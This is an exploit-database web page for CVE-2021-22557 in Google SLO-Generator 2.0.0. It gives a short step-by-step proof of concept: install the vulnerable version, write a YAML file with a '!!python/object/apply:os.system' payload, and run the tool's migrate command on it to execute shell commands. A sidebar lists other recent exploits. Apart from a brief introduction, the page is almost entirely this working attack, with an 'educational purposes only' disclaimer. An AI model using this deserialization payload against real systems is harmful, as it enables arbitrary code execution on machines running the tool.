Google slogenerator 2.0.0 code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-10-07 | Type : local | Platform : linux
This exploit / vulnerability Google slogenerator 2.0.0 code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557

##############################################################################

*Introduction*:
Is a tool to compute and export Service Level Objectives (SLOs), Error
Budgets and Burn Rates, using configurations written in YAML (or JSON)
format.

##############################################################################

*POC:*
1. pip3 install slo-generator==2.0.0
2. 2. Save the below yaml code in a file as exploit.yaml.
!!python/object/apply:os.system ["id;whoami"]
3. Run the below command
slo-generator migrate -b exploit.yaml
##############################################################################

Google slogenerator 2.0.0 code execution


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Google slogenerator 2.0.0 code execution Vulnerability / Exploit